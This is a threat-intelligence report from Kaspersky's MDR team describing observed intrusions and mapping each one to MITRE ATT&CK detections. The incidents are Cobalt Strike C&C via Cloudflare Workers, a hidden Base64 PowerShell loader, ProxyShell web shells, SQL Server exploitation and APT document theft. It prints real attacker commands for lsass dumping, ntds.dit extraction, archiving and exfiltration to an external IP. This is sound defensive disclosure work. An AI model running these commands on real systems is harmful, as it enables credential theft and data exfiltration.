Authors
Introduction
This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.
Command and control via the public cloud
The use of public cloud services like Amazon, Azure or Google can make an attacker’s server difficult to spot. Kaspersky has reported several incidents where attackers used cloud services for C&C.
Case #1: Cloudflare Workers as redirectors
Case description
The incident started with Kaspersky MDR detecting the use of a comprehensive toolset for security assessment, presumably Cobalt Strike, by an antimalware (AM) engine memory scan (MEM:Trojan.Win64.Cobalt.gen). The memory space belongs to the process c:\windows\system32\[legitimate binary name][1].exe.
While investigating, we found that the process had initiated network connections to a potential C&C server:
|
1 2 |
hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence] hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out] |
The URL format indicates the use of Cloudflare Workers.
We then found that earlier, the binary had unsuccessfully[2] attempted to execute an lsass.exe memory dump via comsvcs.dll:
|
1 |
CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full |
Several minutes later, a suspicious .bat script was run. This created a suspicious WMI consumer, later classified by MDR as an additional persistence mechanism.
The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.
Case detection
The table below lists the signs of suspicious activity that were the starting point for the investigation by the SOC.
| MITRE ATT&CK Technique | MDR telemetry event type used | Detection details | Description |
| T1588.002: Tool |
|
AM verdict: MEM:Trojan.Win64.Cobalt.gen, which can be used for Cobalt Strike or Meterpreter | A malicious payload was executed in the victim’s system and started communicating with the C&C server |
| T1620: Reflective Code Loading |
|
AM verdict: MEM:Trojan.Win64.Cobalt.gen | The malicious payload migrated to the victim’s memory |
|
Detection of code injection from an unknown binary into a system binary | ||
| T1071.001: Web Protocols |
|
Suspicious HTTP connections to the malicious URL: blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level | The attacker’s communications with the C&C server |
| T1584.006: Web Services |
|
URL reputation, regular expression in URL | The attacker’s communications with the C&C server |
| T1102.001: Dead Drop Resolver |
|
URL reputation, regular expression in URL | The attacker’s communications with the C&C server |
| T1003.001: LSASS Memory |
|
AM detection on lsass memory access | The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file |
|
Regex on command like: rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full | ||
| T1546.003: Windows Management Instrumentation Event Subscription |
|
WMI active script event consumer created remotely | The attacker gained persistence through active WMI |
Payload hidden in long text
Case #1: A scheduled task that loads content from a long text file
Case description
This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.
Scheduled task:
|
1 |
Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A}, C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9 |
Command:
|
1 |
"wscript.exe" /e:vbscript /b "C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))" |
The scheduled task invokes a VBS script (file path: C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708), which decodes from the Base64-encoded content of the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys, and then executes the latter.
The VBS script mimics the content and behavior of the legitimate C:\Windows\System32\SyncAppvPublishingServer.vbs file, but the path and file name are different.
The customer approved our MDR SOC analyst’s request to analyze the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content (see the picture below).
The decoded payload contained a link to a C&C server:
Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):
|
1 |
C:\Users\<… cut out … >\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe |
The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.
Fortunately, the telemetry analysis did not reveal any evidence of malicious activity from the discovered C&C server (counter[.]wmail-service[.]com), which would have allowed downloading further stages of infection. In the meantime, a new AM engine signature was released, and the malicious samples were now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was correctly classified as malicious.
Case detection
The table below lists the attack techniques and how they were detected by Kaspersky MDR.
| MITRE ATT&CK Technique | MDR telemetry event type used | Detection details | Description |
| T1547.001: Registry Run Keys / Startup Folder |
|
Regex on autostart entry details | Malicious persistence |
|
Heuristic AM engine verdict: HEUR:Trojan.Multi.Agent.gen | ||
| T1059.001: PowerShell |
|
Regex on autostart entry details | Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression” |
| T1216.001: System Script Proxy Execution |
|
Regex on command line | Malicious payload execution via C:\Windows\System32\ SyncAppvPublishingSer ver.vbs |
| T1204.002: Malicious File |
|
Execution sequence: svchost.exe → explorer.exe → patch.exe From directory: C:\Users\< removed>\Downloads\ExcelAnaly zer 3.4.3\crack\ |
The user executed a file downloaded by the Tixati BitTorrent client As a result, the file 02f4f239-0922-49fe- a338-c7460cb37d95.sys was created |
|
Creation of c:\users\<removed>\downloads\ex celanalyzer 3.4.3\setup_excelanalyzer.exe In this order: chrome.exe → tixati.exe |
||
|
Creation of 02f4f239-0922-49fe- a338-c7460cb37d95.sys In this order: svchost.exe → patch.exe Process command line: “C:\Users\<removed>\Downloads\ ExcelAnalyzer 3.4.3\crack\Patch.exe” The contents of 02f4f239-0922- 49fe-a338-c7460cb37d95.sys do not match the extension (text instead of binary). |
||
| T1027: Obfuscated Files or Information T1140: Deobfuscate/Decode Files or Information |
The suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response | 02f4f239-0922-49fe-a338- c7460cb37d95.sys contained text; starting on line 4890, it contained a Base-64-encoded payload. |
Attacker hid payload |
| T1071.001: Web Protocols |
|
The SOC checked for successful connections to the discovered C&C server. | A search for the attacker’s possible attempts to execute further stages of the attack |
Server-side attacks on the perimeter
Case #1: A ProxyShell vulnerability in Microsoft Exchange
Case description
During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:
|
1 2 3 4 5 6 7 8 9 |
\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rqfja.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\yjiba.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\jiwkl.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\qwezb.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\qspwi.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\premium\upxnl.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\qikyp.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\resources\jvdyt.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\mgsjz.aspx |
The ASPX file format, which the service should not create, and the random file names led our SOC analyst to believe that those files were web shells.
Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.
Similar behavior was detected the next day, this time an attempt at creating one file:
|
1 |
\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rmvbe.aspx |
KES had blocked the exploitation attempts. Nonetheless, the attempts themselves indicated that the Microsoft Exchange server was vulnerable and in need of patching as soon as possible.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
| MITRE ATT&CK Technique | MDR telemetry event type used | Detection details | Description |
| T1190: Exploit Public-Facing Application |
|
Heuristic AM engine verdict: PDM:Exploit.Win32.Generic | Exploitation attempt |
| T1505.003: Web Shell |
|
Attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process | Web shell file creation |
Case #2: MS SQL Server exploitation
Case description
The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21-<…>-<…>-<…>-181797 (Domain / username).
The SQL Server process attempted to create a suspicious file:
|
1 |
c:\windows\serviceprofiles\mssql$sqlexpress\appdata\local\temp\tmpd279.tmp |
We observed that a suspicious assembly was loaded to the sqlserver process (c:\program files\microsoft sql server\mssql15.sqlexpress\mssql\binn\sqlservr.exe) db_0x2D09A3D6\65536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16) with the original file name evilclr.dll.
The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b.
The SQL server host had previously been seen accessible from the Internet and in the process of being scanned by a TOR network.
After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands. For example:
The created SQL jobs attempted to connect to URLs like those shown below:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
hxxp://101.39.<…cut…>.58:16765/2E<…cut…>2F.Png hxxp://103.213.<…cut…>.55:15909/2E<…cut…>2F.Png hxxp://117.122.<…cut…>.10:19365/2E<…cut…>2F.Png hxxp://211.110.<…cut…>.208:19724/2E<…cut…>2F.Png hxxp://216.189.<…cut…>.94:19063/2E<.cut...>2F.Png hxxp://217.69.<…cut…>.139:13171/2E<…cut…>2F.Png hxxp://222.138.<…cut…>.26:17566/2E<…cut…>2F.Png hxxp://222.186.<…cut…>.157:14922/2E<…cut…>2F.Png hxxp://45.76.<…cut…>.180:17128/2E<…cut…>2F.Png hxxp://59.97.<…cut…>.243:17801/2E<…cut…>2F.Png hxxp://61.174.<…cut…>.163:15457/2E<…cut…>2F.Png hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png |
Some of the IP addresses were already on the deny list, while others were added in response to this incident.
We were not able to observe any other host within the monitoring scope attempt to connect to these IP addresses, which confirmed that the attack was detected at an early stage.
The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b) was detected on another SQL Server host, which was also accessible from the Internet.
Since the attack was detected in time, and its further progress was blocked by the AM engine, the attacker was not able to proceed, while the customer corrected the network configuration errors to block access to the server from the Internet.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
| MITRE ATT&CK Technique | MDR telemetry event type used | Detection details | Description |
| T1090.003: Multi-hop Proxy T1595.002: Vulnerability Scanning |
|
Reputation analysis showed the use of TOR network for scanning. The scanning activity was detected through network connection analysis and by the AM engine. | The attacker scanned the SQL Server host |
| T1190: Exploit Public-Facing Application |
|
The server application sqlservr.exe launched powershell.exe, in the following order: services.exe → sqlservr.exe → powershell.exe | The attacker successfully exploited the SQL server |
|
Execution of the object previously detected as an autostart entry with a bad reputation: sql:\SQLEXPRESS\db_0x2D09A3D6\65537_fscbd; original file name: evilclr.dll | ||
| T1059.001: PowerShell |
|
Command line analysis showed the use of PowerShell. | Malicious persistence via an SQL Server job |
| T1027: Obfuscated Files or Information |
|
Regex- and ML-based analysis of the SQL Server Agent job command line | The attacker attempted to evade detection |
|
Regex- and ML-based analysis of the services.exe → sqlservr.exe → powershell.exe execution sequence command line | ||
| T1505.001: SQL Stored Procedures |
|
SQL Server Agent job analysis | Malicious persistence via an SQL Server job |
|
Heuristic detects on PowerShell SQL Server Agent; verdict: HEUR:Trojan.Multi.Powecod.a | ||
| T1071.001: Web Protocols |
|
The URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server. | The attacker’s C&C server |
What does exfiltration in a real-life APT look like?
Case #1: Collecting and stealing documents
Case description
Kaspersky MDR detected suspicious activity on one particular host in customer infrastructure, as the following process was started remotely by psexec:
“cmd.exe” /c “c:\perflogs\1.bat”, which started:
|
1 2 3 |
findstr "10.<…cut…>. wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1 wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1 |
After that, the following inventory commands were executed by the binary C:\ProgramData\USOPrivate\ UpdateStore\windnphd.exe:
|
1 2 3 4 5 6 7 8 9 |
C:\Windows\system32\cmd.exe /C ping 10.<…cut…> -n 2 query user C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3> C:\Windows\system32\cmd.exe /C net group "domain admins" /domain C:\Windows\system32\cmd.exe /C ping <hostname1> C:\Windows\system32\cmd.exe /C vssadmin list shadows C:\Windows\system32\cmd.exe /C ipconfig /all C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$ |
Suspicious commands triggering actions in the Active Directory Database were executed:
|
1 2 3 4 |
C:\Windows\system32\cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit C:\Windows\system32\cmd.exe /C dir c:\windows\system32\ntds.dit C:\Windows\system32\cmd.exe /C dir c:\ C:\Windows\system32\cmd.exe /C dir c:\windows\ntds\ntds.dit |
|
1 |
hxxp[:]//31.192.234[.]60:53/useintget |
|
1 2 3 4 5 |
nd.exe c:\windows\system32\config\system c:\users\public\sys.txt nd.exe c:\windows\ntds\ntds.dit c:\users\public\nt.txt C:\Windows\system32\cmd.exe /C move *.txt c:\users\public\tmp C:\Windows\system32\cmd.exe /C rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp\ rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp\ |
|
1 |
schtasks /create /sc minute /mo 30 /ru system /tn \tmp /tr "c:\users\public\s.exe c:\users\public\0816-s.rar 38[.]54[.]14[.]183 53 down" /f |
This executable used the archive c:\users\public\0816-s.rar and the suspicious IP address 38[.]54[.]14[.]183, located in Vietnam, as parameters.
The 0816-s.rar archive was created via remote execution of the following command through psexec:
|
1 |
rar a -k -r -s -ta[Pass_in_clear_text] -m1 c:\users\public\0816-s.rar "\\10.<…cut…>\c$\users\<username4>\Documents\<DocumentFolder1>" |
After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.
Similar suspicious behavior was detected on another host, <hostname>.
First, a suspicious file was created over the SMB protocol: c:\users\public\winpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).
Next, a task was created remotely via psexec.exe:
|
1 |
schtasks /create /sc minute /mo 30 /ru system /tn \tmp /tr "c:\users\public\winpdasd.exe" /f |
During task execution, an external network communication was detected, and certain discovery commands were executed:
|
1 2 3 4 |
hxxp://31[.]192.234.60:53/useintget ping 10.<…cut…> -n 1 query user net use |
This was followed by a connection to a network share on the host 10.<…cut…> as username3:
|
1 |
C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3> |
More reconnaissance command executions were detected:
|
1 2 3 4 5 |
C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$\users\<username4>\AppData\Roaming\Adobe\Linguistics C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> |findstr rundll32.exe tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> C:\Windows\system32\cmd.exe /C taskkill /S 10.<…cut…> -U <domain>\<username3> -P <password> /pid <PID> /f C:\Windows\system32\cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain>\<username3> /p "<password>" /tn \Microsoft\Windows\Tcpip\dcrpytod |
Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:
|
1 |
C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 30 /ru system /tn \Microsoft\Windows\Network\windpch /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\windpchsvc.exe" /f |
After that, C&C communications were detected:
|
1 |
hxxp://139.162.35[.]70:53/micsoftgp |
This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
| MITRE ATT&CK Technique | MDR telemetry event type used | Detection details | Description |
| T1569.002: Service Execution |
|
Command line analysis | The attacker performed reconnaissance and search in local logs The attacker persisted in the victim’s system through service creation |
|
Windows events on service installation and service start | ||
|
AM behavior analysis | The attacker executed windnphd.exe through psexec | |
| T1592: Gather Victim Host Information T1590: Gather Victim Network Information |
|
Command line analysis | The attacker performed internal reconnaissance |
| T1021.002: SMB/Windows Admin Shares |
|
Inbound and outbound share access | The attacker tried to access: \\10.<…cut…>.65\ipc$ \\10.<…cut…>.52\c$ |
| T1003.003: NTDS |
|
Command line analysis | The attacker accessed NTDS.dit with ntdsutil |
| T1071.001: Web Protocols |
|
The SOC checked if the data transfer was successful | The attacker communicated with the C&C server at hxxp[:]//31.192.234[ .]60:53/useintget |
|
The connection was initiated by the suspicious process windnphd.exe | ||
| T1571: Non-Standard Port |
|
The SOC detected the use of the HTTP protocol on the non-standard 53/TCP port | Attacker used the C&C server hxxp[:]//31.192.234[ .]60:53/useintget |
| T1587.001: Malware |
|
Use of various suspicious binaries prepared by the attacker specifically for this attack | The attacker used custom tools: s.exe winpdasd.exe windpchsvc.exe (see detailed report below) |
| T1497: Virtualization/Sandbox Evasion |
|
Detected the HookSleep function (see below) | The attacker attempted to detect sandboxing. The emulation detection was found in the custom tools: winpdasd.exe and windpchsvc.exe |
| T1036.005: Match Legitimate Name or Location |
|
Operations with the file c:\users\Default\ntusers.dat | The attacker attempted to hide a shellcode inside a file with a name similar to the legitimate ntuser.dat |
| T1140: Deobfuscate/Decode Files or Information |
|
The file ntusers.dat contained an encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe | The attacker executed arbitrary code |
| T1560.001: Archive via Utility |
|
Use of the RAR archiver for data collection | The attacker archived the stolen credentials and documents |
| T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol |
|
Command line analysis | The attacker used a custom tool to exfiltrate data |
|
Analysis of the process that initiated the connection |
An analysis of the custom tools used by the attacker
windpchsvc.exe and winpdasd.exe
Both malware samples are designed to extract a payload from a file, decode it, and directly execute it via a function call. The payload is encoded shellcode.
Both files read in from a file intended to deceive investigators and users by applying naming conventions that are similar to system files:
Payload file for windpchsvc.exe
The malware, windpchsvc.exe, reads from the file c:\users\Default\ntusers.dat. A legitimate file, named ntuser.dat, exists in this location. Note that the bona fide registry file does not contain an ‘s’.
A similar file name was used for the winpdasd.exe malware:
Payload file for winpdasd.exe
The malware reads from this file and decodes the bytes for direct execution via a function call as seen below (call [ebp+payload_alloc] and call esi ):
windpchsvc.exe: decode, allocate memory, copy to mem, execute
winpdasd.exe: decode, allocate memory, copy to mem, execute via function call
The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.
Some of the images show a function that I labeled “HookSleep” and which might be used for sandbox evasion in other forms of this malware. The function has no direct effect on the execution of the payload.
The decompiled function can be seen below:
The “HookSleep” function found in both files, decompiled
When debugging, this worked as expected. The Win32 Sleep function is directed to the defined function in the malware:
The Sleep function redirected back to the malware code
s.exe
This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:
|
1 |
s.exe <file> <IP address> <port> <up|down> |
This is basically netcat without all the features. The benefit of this is that it does not draw as much attention as netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and output to a file (albeit with some added junk characters in the results). We also found that the sample was incapable of executing anything after a download or upload.
The algorithm is pretty simple: network startup, parse arguments, create socket, send file or wait for file based on arguments. The decompiled main function can be seen below:
Decompiled network transfer tool
[1] The actual name of the binary is unimportant; hence it was skipped.
[2] Kaspersky Endpoint Security efficiently protects LSASS memory.
Authors
From the same authors
In the same category
Server-side attacks, C&C in public clouds and other MDR cases we observed